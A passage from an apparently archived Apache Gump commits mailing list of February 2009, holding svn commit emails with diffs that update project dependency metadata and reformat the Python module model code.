<depend project="slf4j"/> + </project> </module> From [email protected] Thu Feb 19 14:09:41 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93652 invoked from network); 19 Feb 2009 14:09:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 14:09:40 -0000 Received: (qmail 23188 invoked by uid 500); 19 Feb 2009 14:09:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23179 invoked by uid 99); 19 Feb 2009 14:09:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 06:09:40 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 14:09:39 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3FE3C238896B; Thu, 19 Feb 2009 14:09:19 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745873 - /gump/metadata/project/lenya.xml Date: Thu, 19 Feb 2009 14:09:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 14:09:18 2009 New Revision: 745873 URL: http://svn.apache.org/viewvc?rev=745873&view=rev Log: websphinx has gone Modified: gump/metadata/project/lenya.xml Modified: gump/metadata/project/lenya.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/lenya.xml?rev=745873&r1=745872&r2=745873&view=diff ============================================================================== --- gump/metadata/project/lenya.xml (original) +++ gump/metadata/project/lenya.xml Thu Feb 19 14:09:18 2009 @@ -51,7 +51,6 @@ <depend project="jtidy"/> <depend project="junit"/> <depend project="quartz"/> - <depend project="websphinx"/> <depend project="xmldb"/> <work nested="tools/anttasks"/> @@ -67,13 +66,4 @@ </nag--> </project> - <project name="websphinx"> - <package>websphinx</package> - - <jar name="lib/websphinx-0.5.jar"/> - - <license name="legal/LICENSE.websphinx"/> - - </project> - </module> From [email protected] Thu Feb 19 14:12:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94878 invoked from network); 19 Feb 2009 14:12:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 14:12:06 -0000 Received: (qmail 28516 invoked by uid 500); 19 Feb 2009 14:12:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28506 invoked by uid 99); 19 Feb 2009 14:12:06 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 06:12:06 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 14:12:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0C1352388975; Thu, 19 Feb 2009 14:11:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745874 - /gump/metadata/project/james-mailet.xml Date: Thu, 19 Feb 2009 14:11:42 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 14:11:41 2009 New Revision: 745874 URL: http://svn.apache.org/viewvc?rev=745874&view=rev Log: build => target Modified: gump/metadata/project/james-mailet.xml Modified: gump/metadata/project/james-mailet.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/james-mailet.xml?rev=745874&r1=745873&r2=745874&view=diff ============================================================================== --- gump/metadata/project/james-mailet.xml (original) +++ gump/metadata/project/james-mailet.xml Thu Feb 19 14:11:41 2009 @@ -40,10 +40,10 @@ <depend project="magic" runtime="true" inherit="runtime"/> - <work nested="build/classes"/> - <work nested="build/test/classes"/> + <work nested="target/classes"/> + <work nested="target/test/classes"/> - <jar name="build/lib/mailet-@@DATE@@.jar"/> + <jar name="target/lib/mailet-@@DATE@@.jar"/> <nag to="[email protected]" from="Gump &lt;[email protected]&gt;"/> From [email protected] Thu Feb 19 14:17:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1532 invoked from network); 19 Feb 2009 14:17:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 14:17:17 -0000 Received: (qmail 35664 invoked by uid 500); 19 Feb 2009 14:17:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35655 invoked by uid 99); 19 Feb 2009 14:17:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 06:17:17 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 14:17:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A89A1238896B; Thu, 19 Feb 2009 14:16:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745878 - /gump/metadata/project/camel.xml Date: Thu, 19 Feb 2009 14:16:56 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 14:16:55 2009 New Revision: 745878 URL: http://svn.apache.org/viewvc?rev=745878&view=rev Log: fix repo URL for Camel Modified: gump/metadata/project/camel.xml Modified: gump/metadata/project/camel.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/camel.xml?rev=745878&r1=745877&r2=745878&view=diff ============================================================================== --- gump/metadata/project/camel.xml (original) +++ gump/metadata/project/camel.xml Thu Feb 19 14:16:55 2009 @@ -16,19 +16,20 @@ limitations under the License. --> <module name="camel"> - <url href="http://activemq.apache.org/"/> + <url href="http://camel.apache.org/"/> <description> - ActiveMQ message broker and enterprise integration patterns provider. + Integration framework based on known Enterprise Integration + Patterns with powerful Bean Integration </description> - <svn repository="asf" dir="activemq/camel/trunk"/> + <svn repository="asf" dir="camel/trunk"/> - <project name="camel" separateLocalRepository="true"> + <project name="camel"> <package>org.apache.camel</package> <description>Camel acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Core</description> <url href="http://activemq.apache.org/"/> - <mvn basedir="camel-core" goal="install"> + <mvn basedir="camel-core" goal="install" separateLocalRepository="true"> <property name="maven.test.skip" value="true"/> </mvn> From [email protected] Thu Feb 19 14:21:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4614 invoked from network); 19 Feb 2009 14:21:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 14:21:20 -0000 Received: (qmail 43789 invoked by uid 500); 19 Feb 2009 14:21:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43779 invoked by uid 99); 19 Feb 2009 14:21:20 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 06:21:20 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 14:21:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0E712238896B; Thu, 19 Feb 2009 14:20:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745881 - /gump/metadata/project/commons-proper.xml Date: Thu, 19 Feb 2009 14:20:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 14:20:57 2009 New Revision: 745881 URL: http://svn.apache.org/viewvc?rev=745881&view=rev Log: split build and test Modified: gump/metadata/project/commons-proper.xml Modified: gump/metadata/project/commons-proper.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/commons-proper.xml?rev=745881&r1=745880&r2=745881&view=diff ============================================================================== --- gump/metadata/project/commons-proper.xml (original) +++ gump/metadata/project/commons-proper.xml Thu Feb 19 14:20:57 2009 @@ -482,7 +482,9 @@ <package>org.apache.commons.jci</package> <description>Commons JCI</description> - <mvn basedir="jci"/> + <mvn basedir="jci"> + <property name="maven.test.skip" value="true"/> + </mvn> <option project="bcel"/> <option project="commons-collections"/> @@ -497,13 +499,19 @@ <option project="maven-cobertura-plugin"/> <home nested="jci/target"/> <jar name="commons-jci-@@DATE@@.jar"/> - + <!--nag to="[email protected]" + from="Stefan Bodewig &lt;[email protected]&gt;"/--> + </project> + + <project name="commons-jci-test"> + <mvn basedir="jci"/> + <depend project="commons-jci"/> <junitreport nested="jci/compilers/groovy/target/surefire-reports"/> <!--nag to="[email protected]" from="Stefan Bodewig &lt;[email protected]&gt;"/--> </project> - + <!-- Moved to jakarta-commons-jelly-core.xml <project name="commons-jelly"> ... From [email protected] Fri Feb 20 06:13:05 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21573 invoked from network); 20 Feb 2009 06:13:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2009 06:13:04 -0000 Received: (qmail 77019 invoked by uid 500); 20 Feb 2009 06:13:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77008 invoked by uid 99); 20 Feb 2009 06:13:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 22:13:04 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 20 Feb 2009 06:12:54 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B259523889B7; Fri, 20 Feb 2009 06:12:32 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746160 - in /gump/trunk/python/gump/core/model: module.py repository.py Date: Fri, 20 Feb 2009 06:12:32 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 20 06:12:31 2009 New Revision: 746160 URL: http://svn.apache.org/viewvc?rev=746160&view=rev Log: PyLint assisted cleanup Modified: gump/trunk/python/gump/core/model/module.py gump/trunk/python/gump/core/model/repository.py Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=746160&r1=746159&r2=746160&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Fri Feb 20 06:12:31 2009 @@ -18,27 +18,47 @@ """ This module contains information on <module and it's repository references. - -""" -from time import localtime, strftime, tzname +""" -from gump.core.model.state import * -from gump.core.model.stats import Statable, Statistics -from gump.core.model.project import * -from gump.core.model.object import NamedModelObject +from gump import log from gump.core.model.misc import Resultable, Positioned, AddressPair -from gump.util import getIndent -from gump.util.note import transferAnnotations, Annotatable -from gump.util.domutils import * +from gump.core.model.object import NamedModelObject, ModelObject +from gump.core.model.project import Project, ProjectSummary +from gump.core.model.state import REASON_CONFIG_FAILED, REASON_PACKAGE, \ + STATE_COMPLETE, STATE_FAILED +from gump.core.model.stats import Statable, Statistics +from gump.util import createOrderedList, default, getIndent, \ + getStringFromUnicode +from gump.util.domutils import getDomAttributeValue, getDomChildValue, \ + hasDomAttribute, transferDomInfo + +import os.path +import sys + +def create_scm_instance(scm_type, dom, repo): + """ + Factory method for matching ModuleScm subclass of given SCM + """ + if scm_type == 'cvs': + return ModuleCvs(dom, repo) + elif scm_type == 'p4': + return ModuleP4(dom, repo) + elif scm_type == 'artifacts': + return ModuleArtifacts(dom, repo) + return ModuleScm(dom, repo) + class ModuleScm(ModelObject): - def __init__(self,dom,repository): - ModelObject.__init__(self,dom) - + """ + Describes the common properties of a module's SCM system + """ + def __init__(self, dom, repository): + ModelObject.__init__(self, dom) + # Reference to the shared repository - self.repository = repository - + self.repository = repository + # Extract settings self.dir = self.getDomAttributeValue('dir') self.type = self.element.tagName @@ -48,17 +68,18 @@ if url and self.hasDir(): url += self.getDir() return url - + def hasDir(self): - if self.dir: return True + if self.dir: + return True return False - + def getDir(self): return self.dir - + def getViewUrl(self): return self.getRootUrl() - + def getScmType(self): return self.type @@ -66,84 +87,96 @@ return self.repository.getType() class ModuleCvs(ModuleScm): - def __init__(self,dom,repository): - ModuleScm.__init__(self, dom, repository) - + """ + Describes the properties of a module's <cvs element + """ + def __init__(self, dom, repository): + ModuleScm.__init__(self, dom, repository) + # Extract settings - self.tag = self.getDomAttributeValue('tag') - self.module = self.getDomAttributeValue('module') - self.hostPrefix = self.getDomAttributeValue('host-prefix') - + self.tag = self.getDomAttributeValue('tag') + self.module = self.getDomAttributeValue('module') + self.hostPrefix = self.getDomAttributeValue('host-prefix') + def getCvsRoot(self): """Construct the CVS root for this set of information""" # Form the CVS root starting with the method - root=':' + str(self.repository.getMethod()) + ':' + root = ':' + str(self.repository.getMethod()) + ':' # Add the user (if set) - if self.repository.hasUser(): root+=str(self.repository.getUser()) + if self.repository.hasUser(): + root += str(self.repository.getUser()) # Craft the hostname if self.repository.hasHostname(): - root+='@' - if self.hostPrefix: root+=self.hostPrefix+'.' - root+=str(self.repository.getHostname()) + ':' - + root += '@' + if self.hostPrefix: + root += self.hostPrefix + '.' + root += str(self.repository.getHostname()) + ':' + # :TODO: Allow users to override default port # this is throwing off the kaffe.org cvs repository... #if str(self.repository.getMethod())=='pserver': - # root+='2401' - root+=str(self.repository.getPath()) - + # root += '2401' + root += str(self.repository.getPath()) + # If a subdirectory - if self.dir: root+='/'+str(self.dir) + if self.dir: + root += '/' + str(self.dir) return root - + def hasTag(self): - if self.tag: return True + if self.tag: + return True return False - + def getTag(self): return str(self.tag) - + def hasHostPrefix(self): - if self.hostPrefix: return True + if self.hostPrefix: + return True return False - + def getHostPrefix(self): return str(self.hostPrefix) - + def hasModule(self): - if self.module: return True + if self.module: + return True return False - + def getModule(self): return str(self.module) - + def getViewUrl(self): - url=None + url = None if self.repository.hasCvsWeb(): if self.dir: - url=self.repostory.getCvsWeb()+'/'+str(self.dir)+'/' + url = self.repository.getCvsWeb() + '/' + str(self.dir) + '/' else: - url=self.repostory.getCvsWeb()+'/'+self.module.getName() + url = self.repository.getCvsWeb() + '/' + self.module.getName() return url - + class ModuleP4(ModuleScm): - def __init__(self,dom,repository): - ModuleScm.__init__(self, dom, repository) + """ + Describes the properties of a module's <p4 element + """ + def __init__(self, dom, repository): + ModuleScm.__init__(self, dom, repository) # Reference to the shared repository - self.hostname='perforce:1666' + self.hostname = 'perforce:1666' if repository.hasDomChild('root'): - root=repository.getDomChild('root') - self.method=getDomChildValue(root,'method') - self.user=getDomChildValue(root,'user') - self.password=getDomChildValue(root,'password') - self.path=getDomChildValue(root,'path') - self.hostname=getDomChildValue(root,'hostname') - self.clientspec=getDomChildValue(root,'clientspec') + root = repository.getDomChild('root') + self.method = getDomChildValue(root, 'method') + self.user = getDomChildValue(root, 'user') + self.password = getDomChildValue(root, 'password') + self.path = getDomChildValue(root, 'path') + self.hostname = getDomChildValue(root, 'hostname') + self.clientspec = getDomChildValue(root, 'clientspec') - self.tag=self.getDomAttributeValue('tag') + self.tag = self.getDomAttributeValue('tag') def getPort(self): return str(self.hostname) @@ -156,172 +189,179 @@ def getClientspec(self): return str(self.clientspec) - + def hasTag(self): - if self.tag: return True + if self.tag: + return True return False - + def getTag(self): return str(self.tag) - + class ModuleArtifacts(ModelObject): - def __init__(self,dom,repository): - ModelObject.__init__(self,dom) - + """ + Describes the properties of a module's <artifacts element + """ + def __init__(self, dom, repository): + ModelObject.__init__(self, dom) + # Reference to the shared repository - self.repository=repository - + self.repository = repository + # Extract settings self.url = self.getDomAttributeValue('url') - self.group=self.getDomAttributeValue('group') - + self.group = self.getDomAttributeValue('group') + def getRootUrl(self): - url=self.repository.getUrl() + url = self.repository.getUrl() if self.hasUrl(): - url+=self.getUrl() + url += self.getUrl() return url - + def hasUrl(self): - if self.url: return True + if self.url: + return True return False - + def getUrl(self): return self.url - + def getGroup(self): return self.group - + class Module(NamedModelObject, Statable, Resultable, Positioned): """Set of Modules (which contain projects)""" - def __init__(self,name,dom,owner): - NamedModelObject.__init__(self,name,dom,owner) - + def __init__(self, name, dom, owner): + NamedModelObject.__init__(self, name, dom, owner) + Statable.__init__(self) Resultable.__init__(self) Positioned.__init__(self) - - self.totalDepends=[] - self.totalDependees=[] - - self.projects={} - - self.notifys=[] - - self.repository=None + + self.totalDepends = [] + self.totalDependees = [] + + self.projects = {} + + self.notifys = [] + + self.repository = None self.scm = None - + self.packaged = False - self.redistributable= False - + self.redistributable = False + # Changes were found (when updating) self.modified = False - + # The task of updating has occured.. self.updated = False - + self.affected = 0 - + # Extract settings - self.tag='' - - self.url=None - self.desc='' - + self.tag = '' + + self.url = None + self.desc = '' + # - self.workspace=None - self.workdir=None - - self.groupId=None - - def getObjectForTag(self,tag,dom,name=None): + self.workspace = None + self.workdir = None + + self.groupId = None + + def getObjectForTag(self, tag, dom, name = None): """ - Get a new (or spliced) object for this tag + Get a new (or spliced) object for this tag """ - - object=None - + + obj = None + if 'project' == tag: - - owner=self.getOwner() + + owner = self.getOwner() if self.hasProject(name): - object=self.getProject(name) - object.splice(dom) + obj = self.getProject(name) + obj.splice(dom) elif owner.hasProject(name): - object=owner.getProject(name) - object.splice(dom) + obj = owner.getProject(name) + obj.splice(dom) self.addProject(object) else: - from gump.core.model.project import Project - object=Project(name,dom,self) + obj = Project(name, dom, self) self.addProject(object) - return object - + return obj + def resolve(self): """ Resolving requires creating objects (in the correct lists/maps) for certain high level XML elements, e.g. <project. """ - - if self.isResolved(): return - - owner=self.getOwner() - + + if self.isResolved(): + return + + owner = self.getOwner() + for pdom in self.getDomChildIterator('project'): - if hasDomAttribute(pdom,'name'): - name=getDomAttributeValue(pdom,'name') - + if hasDomAttribute(pdom, 'name'): + name = getDomAttributeValue(pdom, 'name') + if owner.hasProject(name): - project=owner.getProject(name) - + project = owner.getProject(name) + if not self.hasProject(name): - if not project.inModule() or (project.getModule() == self): + if not project.inModule() \ + or (project.getModule() == self): self.addProject(project) - else: - pass - # Duplicate project... Hmm - # :TODO: + else: + # Duplicate project... Hmm + # :TODO: + pass project.splice(pdom) - elif self.hasProject(name): + elif self.hasProject(name): project.splice(pdom) else: - project=Project(name,pdom,self) + project = Project(name, pdom, self) self.addProject(project) - + self.setResolved() - + # provide default elements when not defined in xml - def complete(self,workspace): - + def complete(self, workspace): + # Give some indication when spinning on # circular dependencies, 'cos even though we # have code in to not spin, never assume never... log.debug('Complete: %s' % self) - - if self.isComplete(): return - # :TODO: hacky - self.workspace=workspace - + if self.isComplete(): + return + + # :TODO: hacky + self.workspace = workspace + # Defaults - self.workdir=self.getName() - self.groupId=self.getName() - + self.workdir = self.getName() + self.groupId = self.getName() + # Import overrides from DOM - transferDomInfo( self.element, self, {'srcdir':'workdir'}) - - packaged=False - + transferDomInfo(self.element, self, {'srcdir':'workdir'}) + + packaged = False + # Claim ownership & check for packages # ################################################### # A module which contains only packaged projects might as # well be considered packages, no need to update from CVS # since we won't be building. - packageCount=0 - allPackaged=True - + packageCount = 0 + allPackaged = True + for project in self.getProjects(): - + # # Check for duplications # @@ -329,30 +369,33 @@ # Claim ownership self.addProject(project) elif not self == project.getModule(): - workspace.addError('Duplicate project [' + project.getName() + '] in [' \ - + project.getModule().getName() + '] and now [' + self.getName() + ']') - + workspace.addError('Duplicate project [' + project.getName() + \ + '] in [' \ + + project.getModule().getName() \ + + '] and now [' + self.getName() + ']') + # # Check for packaged # if not project.isPackaged(): - allPackaged=False + allPackaged = False else: self.addInfo('Packaged Project: ' + project.getName()) - packageCount+=1 - + packageCount += 1 + # Must be one to be all - if not packageCount: allPackaged=False - + if not packageCount: + allPackaged = False + log.debug('Packaged? ' + `self` + ':' + `packageCount`) - + # Give this module a second try, if some are packaged, and # check if the others have no outputs, then call them good. if packageCount and not allPackaged: - + log.debug('Packaged? ' + `self` + ':' + `packageCount`) - - allPackaged=True + + allPackaged = True for project in self.getProjects(): if not project.isPackaged(): if not project.hasOutputs(): @@ -361,77 +404,80 @@ # project in a module as a package, and those that do # not product significant outputs (e.g. test projects) # will be asssumed to be packages. - # - project.setHonoraryPackage(True) - project.changeState(STATE_COMPLETE,REASON_PACKAGE) - packageCount+=1 - else: - allPackaged=False + # + project.setHonoraryPackage(True) + project.changeState(STATE_COMPLETE, REASON_PACKAGE) + packageCount += 1 + else: + allPackaged = False if packageCount: - self.addWarning('Incomplete \'Packaged\' Module. Project: ' + \ - project.getName() + ' is not packaged') - + self.addWarning('Incomplete \'Packaged\' Module. ' \ + + 'Project: ' \ + + project.getName() \ + + ' is not packaged') + # If packages module, accept it... if allPackaged: - packaged=True + packaged = True self.setPackaged(True) - self.changeState(STATE_COMPLETE,REASON_PACKAGE) + self.changeState(STATE_COMPLETE, REASON_PACKAGE) self.addInfo("\'Packaged\' Module. (Packaged projects: " + \ - `packageCount` + '.)') + `packageCount` + '.)') # Determine source directory - self.absWorkingDir= \ - os.path.abspath( - os.path.join(workspace.getBaseDirectory(), - self.workdir)) - - self.absSrcCtlDir= \ - os.path.abspath( - os.path.join( workspace.getSourceControlStagingDirectory(), - self.getName())) # todo allow override + self.absWorkingDir = \ + os.path.abspath(os.path.join(workspace.getBaseDirectory(), + self.workdir)) + + self.absSrcCtlDir = \ + os.path.abspath( + os.path.join(workspace.getSourceControlStagingDirectory(), + self.getName()) + ) # todo allow override # For when multiple gump runs share (on posix) - self.absUpdateLock= \ - os.path.abspath( - os.path.join( workspace.getSourceControlStagingDirectory(), - self.getName() + '.lock')) - + self.absUpdateLock = \ + os.path.abspath( + os.path.join(workspace.getSourceControlStagingDirectory(), + self.getName() + '.lock')) + if not packaged: self.parseScm() # Grab all notifications for notifyEntry in self.getDomChildIterator('nag'): # Determine where to send - toaddr=getDomAttributeValue(notifyEntry,'to',workspace.administrator) - fromaddr=getDomAttributeValue(notifyEntry,'from',workspace.email) - self.notifys.append( - AddressPair( - getStringFromUnicode(toaddr), - getStringFromUnicode(fromaddr))) - + toaddr = getDomAttributeValue(notifyEntry, 'to', + workspace.administrator) + fromaddr = getDomAttributeValue(notifyEntry, 'from', + workspace.email) + self.notifys.append(AddressPair( + getStringFromUnicode(toaddr), + getStringFromUnicode(fromaddr))) + if self.hasDomChild('url'): - url=self.getDomChild('url') - self.url=getDomAttributeValue(url,'href') - + url = self.getDomChild('url') + self.url = getDomAttributeValue(url, 'href') + if self.hasDomChild('description'): - self.desc=self.getDomChildValue('description') + self.desc = self.getDomChildValue('description') # Existence means 'true' - self.redistributable=self.hasDomChild('redistributable') + self.redistributable = self.hasDomChild('redistributable') # make groupId default to module's name if not self.groupId: - self.groupId = self.getName(); + self.groupId = self.getName() # For prettiness - self.sortedProjects=createOrderedList(self.getProjects()) - + self.sortedProjects = createOrderedList(self.getProjects()) + # Copy over any XML errors/warnings - # :TODO:#1: transferAnnotations(self.xml, self) - - self.setComplete(True) - + # :TODO:#1: transferAnnotations(self.xml, self) + + self.setComplete(True) + def parseScm(self): """ Parses the child element that holds SCM information @@ -449,293 +495,291 @@ repo = self.workspace.getRepository(repoName) self.repository = repo repo.addModule(self) - self.scm = self.createScmInstance(s, dom, repo) + self.scm = create_scm_instance(s, dom, repo) else: - self.changeState(STATE_FAILED,REASON_CONFIG_FAILED) - self.addError('No such repository ['+ str(repoName) \ - +'] in workspace on [' \ - + self.getName() + ']') + self.changeState(STATE_FAILED, REASON_CONFIG_FAILED) + self.addError('No such repository [' + str(repoName) \ + + '] in workspace on [' \ + + self.getName() + ']') return - def createScmInstance(self, type, dom, repo): - """ - Factory method for matching ModuleScm subclass of given SCM - """ - if type == 'cvs': - return ModuleCvs(dom, repo) - elif type == 'p4': - return ModuleP4(dom, repo) - elif type == 'artifacts': - return ModuleArtifacts(dom, repo) - return ModuleScm(dom, repo) - def hasNotifys(self): - if self.notifys: return True + if self.notifys: + return True return False - + def getNotifys(self): return self.notifys - + def getArtifactGroup(self): """ What do this module's artifacts group under? - + Return String """ return self.groupId - - def addProject(self,project): + + def addProject(self, project): """ Associate this module with this project, and vice verse. """ - name=project.getName() - + name = project.getName() + if self.hasProject(name): raise RuntimeError, 'Attempt to add duplicate project: ' + name - + # Reference this module as owner project.setModule(self) - + # Stash project - self.projects[name]=project - + self.projects[name] = project + # Teach workspace about this also... if not self.getOwner().hasProject(name): self.getOwner().addProject(project) else: - otherProject=self.getOwner().getProject(name) - + otherProject = self.getOwner().getProject(name) + if not project is otherProject: - raise RuntimeError, 'Attempt to add duplicate project (in module): ' + name - - def hasProject(self,name): + raise RuntimeError, \ + 'Attempt to add duplicate project (in module): ' + name + + def hasProject(self, name): return self.projects.has_key(name) - - def getProject(self,name): + + def getProject(self, name): return self.projects[name] - + def getProjects(self): return self.projects.values() - + def getSortedProjects(self): - return self.sortedProjects - + return self.sortedProjects + def getChildren(self): - return self.getProjects() - + return self.getProjects() + def isPackaged(self): return self.packaged - - def setPackaged(self,packaged): - self.packaged=packaged - + + def setPackaged(self, packaged): + self.packaged = packaged + def isRedistributable(self): # Existence means 'true' return self.redistributable or \ (self.repository and self.repository.isRedistributable()) - + # # Get a full list of all the projects that depend # upon projects in this module # - def getFullDependees(self): + def getFullDependees(self): # Calculated once only... - if self.totalDependees: return self.totalDependees - + if self.totalDependees: + return self.totalDependees + for project in self.getProjects(): if not project in self.totalDependees: self.totalDependees.append(project) for dependee in project.getFullDependees(): - dependeeProject=dependee.getOwnerProject() + dependeeProject = dependee.getOwnerProject() if not dependeeProject in self.totalDependees: - self.totalDependees.append(dependeeProject) - - # Sort for prettiness... + self.totalDependees.append(dependeeProject) + + # Sort for prettiness... self.totalDependees.sort() return self.totalDependees - - def getFullDependeeCount(self): - return len(self.getFullDependees()) - - def getFullDepends(self): - if self.totalDepends: return self.totalDepends - + + def getFullDependeeCount(self): + return len(self.getFullDependees()) + + def getFullDepends(self): + if self.totalDepends: + return self.totalDepends + for project in self.getProjects(): if not project in self.totalDepends: self.totalDepends.append(project) for depend in project.getFullDependencies(): - dependProject=depend.getProject() + dependProject = depend.getProject() if not dependProject in self.totalDepends: - self.totalDepends.append(dependProject) + self.totalDepends.append(dependProject) self.totalDepends.sort() return self.totalDepends - - def getFullDependencyCount(self): - return len(self.getFullDepends()) - + + def getFullDependencyCount(self): + return len(self.getFullDepends()) + def getFOGFactor(self): - fogFactor=0 - fogFactors=0 + fogFactor = 0 + fogFactors = 0 for project in self.getProjects(): projectFOGFactor = project.getFOGFactor() fogFactor += projectFOGFactor fogFactors += 1 - + if not fogFactors: - fogFactors=1 # 0/1 is better than 0/0 - + fogFactors = 1 # 0/1 is better than 0/0 + return float(fogFactor)/float(fogFactors) - + def getHistoricalOddsOfSuccess(self): - historicalOdds=0 - historicalOddses=0 + historicalOdds = 0 + historicalOddses = 0 for project in self.getProjects(): - projectHistoricalOddsOfSuccess = project.getHistoricalOddsOfSuccess() - historicalOdds += projectHistoricalOddsOfSuccess - historicalOddses += 1 - + projectHistoricalOddsOfSuccess = \ + project.getHistoricalOddsOfSuccess() + historicalOdds += projectHistoricalOddsOfSuccess + historicalOddses += 1 + if not historicalOddses: - historicalOddses=1 # 0/1 is better than 0/0 - + historicalOddses = 1 # 0/1 is better than 0/0 + return float(historicalOdds)/float(historicalOddses) - + def hasLastModified(self): - return self.getStats().hasLastModified() - + return self.getStats().hasLastModified() + def 